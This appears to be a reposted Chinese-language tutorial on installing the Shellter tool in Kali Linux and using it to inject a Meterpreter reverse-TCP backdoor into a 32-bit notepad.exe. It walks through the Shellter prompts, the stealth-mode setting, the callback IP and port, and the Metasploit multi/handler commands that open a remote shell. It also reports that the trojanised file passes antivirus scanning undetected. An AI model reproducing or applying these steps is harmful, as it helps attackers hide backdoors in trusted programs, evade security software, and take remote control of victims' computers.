kali 免殺工具shellter安裝以及使用


Shellter 是一款動態 shellcode 注入工具,我們可以將shellcode注入到其它程序上,從而來躲避殺毒軟件的查殺。俗稱為免殺

官網:https://www.shellterproject.com/  目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上運行的話

就需要安裝wine環境來運行。我使用的Kali Linux 版本是kali-linux-2020.2目前最新版本  注意的是shellter目前只能注入32位的可執行文件

開始安裝:

1.    apt-get update       //更新一下
2.    apt-get install shellter    //直接apt在線安裝

 

安裝完成后 ,終端直接輸入shellter打開會報錯,根據提示 我們直接執行命令  dpkg --add-architecture i386 && apt-get update && apt-get install wine32

確認安裝即可

現在我們打開shellter就可以打開運行了,工具安裝完成后再/usr/share/windows-resources/shellter  這個文件夾

shellter目錄下的Shellter_Backups文件夾是你注入文件后備份的文件夾,會自動把原文件備份一個到這個文件夾下。

 

免殺實驗:

 

Choose Operation Mode - Auto/Manual (A/M/H):A           //選擇模式 A 自動模式自動注入后門,M高級模式,H幫助

PE Target:/home/notepad.exe            // 注入的程序 這里已windows系統自帶的32位記事本程序舉例

Enable Stealth Mode? (Y/N/H): Y               //是否啟用隱身模式 輸入Y啟用

Use a listed payload or custom? (L/C/H): L         //使用攻擊模塊列表或者自定義? 輸入L 選擇Payload

Select payload by index: 1      //選擇第一個

 

SET LHOST: 192.168.37.137    //設置反彈回來的IP 本機

SET LPORT:4444         //設置接收反彈的端口

這樣我們的木馬后門shellcode就注入到這個文件里去了,

開啟360全部查殺引擎,更新病毒庫,查殺一下試試效果,沒有任何提示。

打開msf,進行配置,

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.37.137
set lport 4444
exploit  //監聽

這時運行帶有后門的notepad.exe文件后,控制端成功連接上來,接下來就可以隨意操作了。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM